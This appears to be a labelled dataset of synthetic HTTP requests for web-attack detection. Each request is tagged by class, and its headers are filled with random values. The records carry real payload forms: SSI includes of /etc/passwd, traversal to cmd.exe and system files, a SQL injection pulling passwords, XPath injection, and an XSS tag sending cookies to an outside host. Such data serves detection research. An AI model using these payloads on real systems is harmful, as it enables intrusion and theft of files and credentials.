Trailer: Accept-Encoding
User-Agent: Mozilla/0.0 (X11; U; SunOS sun4u 6.9; d0-oi; rv:4.2.5) Gecko/35983072
UA-CPU: StrongARM
UA-Color: color16
Via: uytu/5.4 www.wgae9.js, 7.1 www.lcgi1oee.jpg
Transfer-Encoding: compress
Upgrade: l5i/1.7, lDqw/9.3, ade/1.3, rst/9.9
Warning: 100 www.saeeiu.png "ehgteoiulnle" "Tue, 31 May 05 03:38:13 GMT"
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35053
Start - Id: 39774
class: SSI
GET /bJgVB/d7/6r5tlillr.shtml?u1eatnohtln=5hNeoePs0YV&wmtKjv5=88609709&n3Meraazce7m1Ol=adc9nodeols1%2FL%3D%5B%28&etHkedjI6hDei=beurchild&1nhaIhyiiem=w&1gi8toeuaer2ehk=sefi8nsmaknjdb&rn5dyeaift0e=386&aulyiaworfmU1le=%3C%21--+%23include++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&Hy55nfjEDoRN=26394&where3BkYz.=x2d%24+ HTTP/1.1
Host: www.4srietm.cz
Connection: uoiesl
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: burfnet-3tcEd, sof-lcdei;q=0.7, son-udleoue, y-trttzm;q=0.8, r9-oasu;q=0.2
Cache-Control: s=ttoegdh
Client-ip: 211.6.11.10
Cookie: oa=rael;atCzrd354hip=0420
Cookie2: $Version="712"
Date: Mon, 15 Oct 07 03:29:10 UTC
ETag: "m8H_3TREv-OT1yk"
Expect: 100-continue
From: 6Rvlor@tljncre.cz
If-Modified-Since: Thu, 08 Jul 04 24:46:17 UTC
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 265
MIME-Version: 5.1
Pragma: lN='t4hepako'
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: Digest cnonce="aEEac"
Range: 42-82,601-32,-86
Referer: http://ositM8i.be/stht.jsp
TE: trailers,chunked
Trailer: Expect
User-Agent: fi4ev9ret/7.8.6.2
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 357x4433
Via: 5.2 251.113.131.179, thcsex/4.8 67.143.79.15:071
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39774
Start - Id: 49643
class: XPathInjection
GET /sF_GxJKHrQHMdeT/eosoos1ythriiieFMa/e@VCfEPBini/uCeVa/c5niitCennOeynbcR7e/oaialpeeac4ea93aEimi/osroEuaanAcaiAkuk/KxfLjkqZhtpass/tL/GV_7vvJqxqxz/n8rrzVUs_H/aRarH9CCRf_pAX4pecEC.sh?iTetsm=o%5CtibDhan5%24%5Dn&pctt=radrUdbev6baei&kW-kadmin=82687429&ndSeeS=sVc&Aeebkuh2vaaEeEt=ngOrnnee&nyta=muf&athu8twyrs=a1Qewsamodsh6ae&lidEijterue=oyW-.RYG&errR=oxh%27++or+++++%28i+%3C++count%285S%2Fchild%3A%3Atext%28%29%29+++++and++j+%3C++count%28lisha%2Fchild%3A%3Acomment%28%29%29++and+++++k+%3C+++count%28osetnh%2Fchild%3A%3A*%29+++++%29+++++or++++%27ewpafanl%27++%3D+++%27++++nlst%27++or&ImXdKan9sam=8754545181&l3r=h&cshnsrey=813158&adlEaerfil=e2QNRxd5 HTTP/1.1
Host: 32.134.86.203
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: big5, windows-1253
Accept-Encoding: deflate, deflate, deflate
Accept-Language: 91udh-ltmSnGes, ssst-pelze;q=0.7
Cache-Control: no-transform
Client-ip: 18.132.255.142
Cookie: 8FlI=217600;stik0h50ohonl=yooonMkdVa;tua=8
Date: Mon, 22 Jun 09 20:38:16 UTC
ETag: "GclYs7adpC32mPP5W"
From: rl5Ut9Om@ezgu03ute.cz
If-Modified-Since: Mon, 10 Jul 06 02:16:17 UTC
If-Unmodified-Since: Sun, 26 Sep 04 07:25:34 UTC
If-Match: "z1epBmyufILgw7LQ"
If-None-Match: "Rx8FF1UAXjy0sS-"
If-Range: Sun, 02 Dec 07 06:42:23 CET
Max-Forwards: 6607
MIME-Version: 7.8
Pragma: toS=teenfHn
Authorization: Basic ZTZ0aDppZnVt
Referer: http://www.kimoYsrt.cz/9tsdt/ciaxa/h11es/iyse.swf
TE: trailers,gzip;q=0.6
User-Agent: nEnoi (nc8ppsDv; niCDeq5rh)
Via: dvno/1.0 86.196.236.183:4835, 7.5 www.lFfj2wd.gif:95150, 1.7 www.xocUi.html
Transfer-Encoding: gzip
Upgrade: d5det/1.1
X-Forwarded-For: 163.247.165.107
X-Serial-Number: 460757969488
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49643
Start - Id: 45852
class: PathTransversal
GET /C2/vH3nm8tw/iov1ntsbhebvw5grla.shtml?KyJrcp=Ua%7EaEic&dollrhnzi=s%7Etah0u%3CgzwArb&sbadsrs=oetcv&ne35nd7ott=%3DTrnre&ctmpsGh=8807383&ihtts=lefULsSL0qA&bCoaedcp=hTEooU3&ihs6aity=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&oOTmfmailL=+-&mstc2re=eneyasyoa2wafed HTTP/1.0
Host: 62.233.202.214
Connection: oyorUhi
Accept: video/*;q=0.9, video/*;q=0.4, video/quicktime;q=0.4
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.2, identity
Accept-Language: E1-azhlrwte
Cache-Control: no-store
Client-ip: 196.74.49.45
Cookie: sbarerthN=diEssaoip;1h4T1EfXVOdT=7;dt=6462417;0ScAthNy0duxnt=gins;eeceNheMsnisn=2334361114;caeasz5b=4906425420
Cookie2: $Version="5"
Date: Thu, 20 Nov 08 02:31:35 GMT
ETag: W/"mCszWHpD.O1AkJWfA"
Expect: 100-continue
From: nty1riog@emdl05l.uk
If-Modified-Since: Tue, 13 Apr 10 01:39:26 CET
If-Unmodified-Since: Tue, 20 Mar 07 20:32:46 UTC
If-Match: "8u-@EkTLXwTpZywnw"
If-None-Match: "dOSpM7@hAs4J7L56Pi"
If-Range: *
Max-Forwards: 083
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic dGVyYWFkOnlSaW9z
Range: 505894-77
Referer: /wtNXe.dll
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.0 (X11; U; SunOS sun4u 0.8; ey-od; rv:3.8.3) Gecko/59632635
UA-CPU: Sparc
UA-Disp: 011,2094,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8255x255
Via: 2.5 110.254.59.88, 0.8 240.191.168.249, mea/5.6 239.102.105.100
Transfer-Encoding: identity
Upgrade: oaae/2.2
Warning: 787 245.252.99.223 "dmrosab" 
X-Forwarded-For: 239.104.254.12
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45852
Start - Id: 44303
class: OsCommanding
GET /samples/..��..��..��..��..��../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.snWstbt.be
Connection: S6aist0J
Accept: image/jpeg
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 18.62.79.179
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Mon, 13 Dec 04 24:37:58 CET
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sun, 06 Feb 05 20:30:58 GMT
If-Match: "8Qzcs0Ith50ujetsKzuz"
If-None-Match: *
If-Range: "s.hEqU.cPuTTxXWS"
Max-Forwards: 86
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest nc=47dBd7FC
Authorization: Basic QXZuUmhjcnU6YWc2bmExaA==
Range: 3-
Referer: /ns32e/nfrievq/vaue/dms1/aiybianu.doc
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: yrl9srsss/6.3.7
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: 1.3 www.wttans.png:729
Transfer-Encoding: identity
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44303
Start - Id: 41367
class: SqlInjection
PUT /9oijmoeeunwodfie/iyacelseaz9eg6Eh/ynvus67dimcae/sta7InIeO9u5veso/kase8spfstee1a9eu/r0jfMI/gdnTtEhglet/UayeLcA1.mspx? HTTP/1.0
Content-Length: 331
Content-Language: a
Content-Encoding: identity
Content-Location: /njarmE3t.swf
Content-MD5: YXFrcm90dGdpSHN0dDhwSQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 30 Aug 07 11:55:04 UTC
Last-Modified: Fri, 12 Oct 07 19:50:02 UTC
Host: www.s4igle.org
Connection: close
Accept: image/gif;q=0.0, video/mpeg
Accept-Charset: utf-8, windows-1255;q=0.5, x-mac-cyrillic;q=0.9, utf-7, utf-7
Accept-Encoding: deflate;q=0.6, compress;q=0.0
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 200.4.215.226
Cookie: taoEtyeEs5=1417;o2doezeAxhEe=systemn;ttzautzoaaa=985949;lSwaosasp1alnso=odeuIlnrtwZ;rivRygx6=6BEX
Cookie2: $Version="0"
Date: Fri, 13 Apr 07 24:49:52 UTC
ETag: "ZZiZLREEUVASn-Gfemy7"
Expect: 100-continue
From: wvycy@8isLoesg.de
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Thu, 26 Feb 09 02:11:47 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Jun 09 16:08:24 GMT
Max-Forwards: 7672
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM dG9ub1NydW50OUF5YWJudHluc3RhQnphaHB1d2l6dmFkaTRGdmlobnM=
Authorization: Digest algorithm=o3su
Range: 4608-978400,71-,119649-
Referer: /mWnm/fcEIwt/wwiy/tEewoo/s5njn.bin
TE: deflate,trailers,chunked
Trailer: Connection
User-Agent: d2E4.81 http://www.nAebnna.cz
UA-Disp: 557,1073,8
UA-OS: Windows 98
UA-Color: color32
Via: 9.7 129.117.251.55:96324, stwN/6.7 119.26.188.85
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 930 168.40.198.240 "aetrpi0rwwtHsS" 
X-Serial-Number: 102930294622
----: ------------------------------------

eqoptklTeio4=28&hnodeDm_etc=';    begin     declare    @ret    varchar(8000)  set @ret=':'     select     @ret=@ret+'   '+ut+'/'+password from     eelSee2e    where  t8nnsh>@ret select   @ret   as ret into     foo     end--&t1fbLiwStIz=ihjsd&cQnr=6&wdtto7e3dstTetz=zcn4ii&braieyp=5

End - Id: 41367
Start - Id: 39287
class: SSI
GET /rhaEnnurfbe/dxgiIMaNQtXS..qh5NsM/heridnrhCtiAt/t.TkC/ex@/Jp/S4micpt/edsshtp/aezCTpe2hpK.php3?trt=76o2t.&TbutprCdi7Eesco=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: www.haxk.it
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: iso-8859-7;q=0.8
Accept-Encoding: 
Accept-Language: naanito-oatOs, hhr-i;q=0.7
Cache-Control: max-age=84
Client-ip: 178.60.27.113
Cookie: emlinsaeodats=829177;adminDkC=tbCGL31Y6KEz
Cookie2: $Version="4"
Date: Mon, 07 Jan 08 21:08:18 CET
ETag: "CUCQhxU27N0NfVaIB"
Expect: teiRi02f=tsen
From: tdoqaue@tuogttti.uk
If-Modified-Since: Sat, 06 May 06 16:18:25 UTC
If-Unmodified-Since: Wed, 02 Nov 05 01:35:55 CET
If-Match: "a.ElCHPmTp94qg9Mx"
If-None-Match: "crLfTdEdfeuTpqFIFk"
If-Range: Tue, 14 Aug 07 19:11:14 UTC
Max-Forwards: 86
MIME-Version: 8.4
Pragma: ieyern=w
Proxy-Authorization: Basic aUFxb293YjpvaWFtaHBz
Authorization: NTLM d3JwaWQ5dXB3ZXFTbnNlOHRzYWlhbGlkbmhiZDdldGRpY2lvZGN6cjlhcmc=
Range: 419016-,344-
Referer: http://www.bstnyxt.fr/h4bY.php4
TE: trailers,trailers
Trailer: Upgrade
User-Agent: tonyy/6.4.0
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 320x017
Via: 0.0 www.5Uinh0.gif, 2.0 www.leoet.html, tujeey/1.5 www.e0eszhed.png
Transfer-Encoding: deflate
Upgrade: tfe/7.8, osw/0.1, o7E/9.0, t4ii/3.0
Warning: 243 www.sr5ots.htm "h5poe8s" 
X-Forwarded-For: 171.227.11.27
X-Serial-Number: 729426151535484
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 39287
Start - Id: 43808
class: OsCommanding
GET /_vti_bin/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.59bl.gov
Connection: close
Accept: */*
Accept-Charset: shift_jis;q=0.3, x-mac-icelandic, koi8, iso-8859-4;q=0.8, big5;q=0.6
Accept-Encoding: *
Accept-Language: sgetwejt-lrtAhtse;q=0.2
Cache-Control: max-age=918
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="9"
Date: Tue, 19 Apr 05 15:29:47 UTC
ETag: W/"ZWarviPtT3Lux5IR2"
Expect: u9re=alahjAwN
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Mon, 04 Jan 10 02:16:34 CET
If-Unmodified-Since: Fri, 10 Jun 05 21:26:02 UTC
If-Match: "useCRTuO9zDJi-dYAQ"
If-None-Match: "coV8IVwYjBxRDjgA"
If-Range: Tue, 06 Apr 04 13:52:08 GMT
Max-Forwards: 113
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Digest cnonce="ihec"
Range: 904036-,02113-35,44499-
Referer: http://Shugrd.ch/9Ilve.jsp
TE: trailers
Trailer: Accept-Charset
User-Agent: ndetrTseewyeBsa9eymE
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 3.1 7.18.27.109
Transfer-Encoding: identity
Upgrade: eprO5e/8.0, stnNLn/3.7, rEev/8.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43808
Start - Id: 46988
class: XSS
GET /6T3VA4/sTWB_NrLJx_t_-/iWemmljeq/Q9/awnTiQ2GJ0C@JcTb-6/npMlo8EuxNr/tvkzShLRqylnullEc/aK15_4eiiZ5h44.28JXY/rn9OX/tnlyunetroetitwe/IyaeOps.gif?t1o=6hnN2pcr&Of4Qm@1Lk=1&n484=%28tytperlae%25ra&wh=tR%5Dphpa%25edteo7g&8b.QNboot.iniSBA9N7=eusrs&Ur=88277181&xh=%40imgeuc&iseyn=ereutrenmgobl4wb&egohNi7pvy=%2Fyznoogidk%2B%29xevbscript&9ksrct3e=526&negrgtllrnh=%3Cimg+++++src+%3D+%22mocha%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ne.com%2Fcgi-bin%2Flaasveisas.cgi%27%2Bdocument.cookie%29%3B%5D++%22+%3E HTTP/1.0
Host: www.hnje6e8em.biz
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: iaE='itrvfeg'
Client-ip: 0.51.121.220
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Fri, 04 Dec 09 21:14:23 UTC
ETag: "y.ui2iiERYpWlWPndZiM"
Expect: Fijtt
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Sun, 22 May 05 19:28:50 CET
If-Unmodified-Since: Wed, 09 Jan 08 22:04:13 UTC
If-Match: *
If-None-Match: *
If-Range: "yyDeWKt4A1Y_3RSr5Ay"
Max-Forwards: 4239
MIME-Version: 0.5
Pragma: xnS8Cen='f'
Proxy-Authorization: Digest nonce
Authorization: clHnxy lpUlaI=7zeNS
Range: 5-22964
Referer: http://www.tp2s9a.de/lEohkN/viSEeHoa/Cnudmt/t9ojrh.zip
TE: trailers
Trailer: Range
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 0.4; rB-sI; rv:1.6.6) Gecko/19664896
UA-Disp: 2976,173,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 238x292
Via: 5.6 122.210.198.64:24, FTP/3.3 16.1.156.107, FTP/3.4 164.136.90.55:367
Transfer-Encoding: identity
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 88.21.110.238
X-Serial-Number: 09560109
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46988
Start - Id: 45400
class: PathTransversal
PUT /qseo.gif? HTTP/1.0
Content-Length: 370
Content-Language: rS8d,0ap
Content-Encoding: gzip
Content-Location: http://hciRido.uk/egwp9bs.swf
Content-MD5: aW1jcndwZW10d3NpczloNQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 25 Jul 09 08:08:37 UTC
Last-Modified: Thu, 21 Oct 04 24:13:15 UTC
Host: 60.143.73.1:22145
Connection: close
Accept: image/*, text/html, video/quicktime
Accept-Charset: utf-8, iso-8859-4;q=0.4, utf-8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 44.196.12.207
Cookie: tntiyd5rh=gosi82y;7umto=DdGlibpswdt1%u;M8TP8.Os=bupa6;ah69tfo=0185336873;a6teeEdxdlaoSha=9798;5bnt1szthmz=3
Cookie2: $Version="269"
Date: Tue, 09 Nov 04 06:03:16 CET
ETag: W/"-yfA6unXQjL3zd2"
Expect: teydIc=fganthzn
From: d1Subs@Oaeelb.fr
If-Modified-Since: Tue, 02 Jan 07 20:20:53 GMT
If-Unmodified-Since: Sat, 13 Nov 04 09:57:01 CET
If-Match: "@gYvuUnSXHRg2ELTYB"
If-None-Match: *
If-Range: Fri, 30 Apr 10 04:46:48 GMT
Max-Forwards: 74
MIME-Version: 1.9
Pragma: g=eLdcnsm
Proxy-Authorization: qei4S 0e1e=mede
Authorization: Digest username="isysa"
Range: 96447-,026-322
Referer: http://oens.st/tyiOt/tEixo/aveewteK/eyscun7.mpeg
TE: trailers,deflate,deflate;q=0.5
Trailer: Accept-Charset
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 0.6; qc-ta; rv:1.2.6) Gecko/50694148
UA-CPU: MIPS
UA-Disp: 088,174,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 789x027
Via: 5gamT/1.8 118.86.132.84, HTTP/4.3 253.95.173.116, ebtE/1.3 113.240.31.129
Transfer-Encoding: jgud8n; rfPagn6d=jkDi0ut
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 335 www.lrsn.css "oRaie" "Sat, 09 Aug 08 10:06:34 GMT"
X-Forwarded-For: 32.85.66.113
X-Serial-Number: 279789
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Sbpciaeece=Iiho&edj3osi&ewiz6Ywbd4isa=atseptGl~3o&2aaqse26rditG4e=399102442&jsmy=eWmg0K&67=../../../../../../../../../WINNT/autoexec.bat&sEinhth=42703434&J25YDxZpD=(styleetneL>d7eb&rdnhe5o3oyc1b=ft5ehomeapeolgdcp&lcmibrgh=nPi-crwqDfM&giywed=03MZvy34&uls@YSz0=83067&llbung6g=oo>n&RItuunurs=tn8Eos5dayeexn&PhOZOEA=gwfod6ostylejea&r.s8T=wFm2V1

End - Id: 45400
Start - Id: 45602
class: PathTransversal
GET /itos6retinnorttm/kZQkX/VincludeqOl/bd.swf?nMrr4=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fyo.bat&aanasuednP6dEe=jee&ZGG5jX=epdln HTTP/1.0
Host: 145.255.59.101
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, gzip, identity, gzip;q=0.2, compress
Accept-Language: Di-tlceTto5;q=0.2, n7rwxae-ysms, AwiNnbsl-engTy;q=0.1, ohseltn-ga;q=0.7, oudu-eec;q=0.3
Cache-Control: only-if-cached
Client-ip: 222.143.217.37
Cookie: qUPA4F4var9HvJ=acs2awherehg9n1t;rwedc5f=38;opwae=Utahoeta  6z;2Tt6tedmtsmaa=137
Cookie2: $Version="74"
Date: Tue, 26 Jan 10 17:27:58 UTC
ETag: W/"A4SSBwZMlSj3m58HF"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Wed, 21 Jun 06 22:14:44 CET
If-Unmodified-Since: Mon, 16 Nov 09 24:45:10 UTC
If-Match: *
If-None-Match: "tIp05M.7R5.ZKjsc8_"
If-Range: "xQdnmr.Vnf8b.1gb"
Max-Forwards: 02
MIME-Version: 6.5
Pragma: 5pestsa=li
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest uri=http://Zlteonts.biz/baoont0/waas/rwbcMe/coeqI.pdf
Range: -709
Referer: http://www.dhC3ihvc.be/toui/fiuzDt/Tesonea/aaegr.bin
TE: gzip;q=0.9,trailers,gzip
Trailer: Accept
User-Agent: e3-p1XER http://www.httnsw.ch
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 413x730
Via: 0.4 70.216.45.243
Transfer-Encoding: deflate
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 228.147.206.124
X-Serial-Number: 079212958544590509
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 45602
Start - Id: 46142
class: PathTransversal
GET /i-Je/SvEd.php4?behapE3qad=131&svfi4NdAknThe=6&eWanmseiysdx=934240&of=%2F%2C%2C%2C%2Ftn1Ha%2Fsnetgt%2Fpasswd&eaiiciraus4h5e=fwnlettgs%26nO&feejlpe8nms0=eaeeenoknadn&agevcd=+iframerawyyttmptaeCihvf+%29t&3aept4oifoqrdeh=a+%5C&6tun=i.8YlThJ HTTP/1.0
Host: 94.86.101.204
Connection: ineex
Accept: */*;q=0.5
Accept-Charset: *;q=0.4
Accept-Encoding: gzip
Accept-Language: *;q=0.0
Cache-Control: epssdte='1aten'
Client-ip: 219.211.206.215
Cookie: dymt=hxm;Ui3ya5Jrc=ftiahq1 2eihgrhttpireyx
Cookie2: $Version="9"
Date: Mon, 11 Apr 05 12:48:43 GMT
ETag: "tJuxWT97BFHkVSwXek"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sat, 23 Jun 07 14:26:28 CET
If-Unmodified-Since: Wed, 02 Feb 05 05:24:53 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 07 Jun 07 09:13:54 UTC
Max-Forwards: 427
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: Digest realm
Range: -526467,43-,829-431383
Referer: http://EiitrE.gov/bBnespdr/oc3int/osqli/irsgm.php4
TE: chunked,deflate,chunked
Trailer: Upgrade
User-Agent: d2lrTSefl7nr
UA-CPU: x86
UA-OS: Linux
Via: 4.8 100.17.179.7, HTTP/7.0 58.88.126.188, ticw/5.1 www.rtlY6.shtml
Transfer-Encoding: deflate
Upgrade: etn/2.1, heape/0.1, hIsen/6.7, eUiJr/1.4, ehAnb/3.2
Warning: 167 60.70.73.146 "Bech10nim" "Wed, 08 Feb 06 20:07:02 UTC"
X-Serial-Number: 678023085
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46142
Start - Id: 44390
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.im1utlzn.it
Connection: close
Accept: text/*, audio/x-wav, application/rtf;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Sun, 12 Jul 09 08:48:29 CET
ETag: W/"w0eP-kcfAZYlh_.Ko8M"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Fri, 07 Sep 07 11:36:25 UTC
If-Unmodified-Since: Sat, 14 Oct 06 12:43:03 GMT
If-Match: "ousH@@._ghWIrdSx"
If-None-Match: *
If-Range: Sat, 17 Apr 10 24:21:18 CET
Max-Forwards: 011
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: sn0ye coore=oA6t
Range: -843519
Referer: http://www.mAExiH.com/AsmsTdN/yhlg/enitrede.exe
TE: chunked;q=0.6
Trailer: Proxy-Authorization
User-Agent: tptsbE (7.sOwA; dcAJmv; nwcnSR; dKHhiUq)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8335x3340
Via: 1.6 www.tTimtswn.tiff, HTTP/5.2 84.182.166.38
Transfer-Encoding: identity
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44390
Start - Id: 39632
class: SSI
GET /tsqLrfawelerp/-tmp/sADX_Grr3eyFItb/u@K_BlTW-6gRdYupD/i2eEfNO5benrtraahi/cBsPyssZndPUZcK1Zk/lu6ceu84manmeuAeshht/Rx/8SafUMGjAEnvCxnO.js?gaSuykaH=agRIAxTU4R&ahrqioTsrtrt=ox2mR&oeralHpt=ukXQ2.%402BFTw&dn6Veyeawalu2=4286803494&sid3baboewgMsj=libetcqhifopt&3qaokoows1t=YsonomrthWfUbrah&ewtActdg3=dlbu&oehLsctlsu=2&47t=%3C%21--+++%23include++virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22++++--%3E&49=cDZV1 HTTP/1.0
Host: 178.216.116.106:80
Connection: keep-alive
Accept: video/*
Accept-Charset: utf-7;q=0.7
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 225.141.13.194
Cookie: o2ouvbei=MbeEcrtm;gin5seh=2713;ldcua4Ylw=almsolrcpY4at;bdRnt=8
Cookie2: $Version="9"
Date: Mon, 26 Nov 07 04:19:54 UTC
ETag: "@Py@vCbgWDBllPns"
Expect: 100-continue
From: nneTpp@ds2o4khd.org
If-Modified-Since: Wed, 24 Mar 04 21:53:15 CET
If-Unmodified-Since: Wed, 13 Jul 05 23:05:22 GMT
If-Match: "_SLt8K4i53beQ2dK5"
If-None-Match: *
If-Range: Thu, 09 Jun 05 17:28:28 GMT
Max-Forwards: 6214
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic MklyaW46dHI1dDV6b3A=
Authorization: Basic Yzdqb2FlODpkcnNidGF3
Range: -8469,086240-,65-225201
Referer: http://www.s8RrNn.net/elovffb/f2ro52pt.swf
TE: gzip;q=0.5
Trailer: Cache-Control
User-Agent: Mozilla/7.7 (compatible; mDmdhs; SunOS sun4u; rjrAOs9)
UA-CPU: PowerPC
UA-Disp: 0993,069,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2034x6396
Via: FTP/4.6 22.244.227.174
Transfer-Encoding: compress
Upgrade: o7s/5.6, dipl/2.7
Warning: 233 www.tttteg.htm "ttmdenotsrmsagg2nt4" "Mon, 21 May 07 21:20:21 CET"
X-Forwarded-For: 48.154.117.69
X-Serial-Number: 963759141034519657
----: --------------------
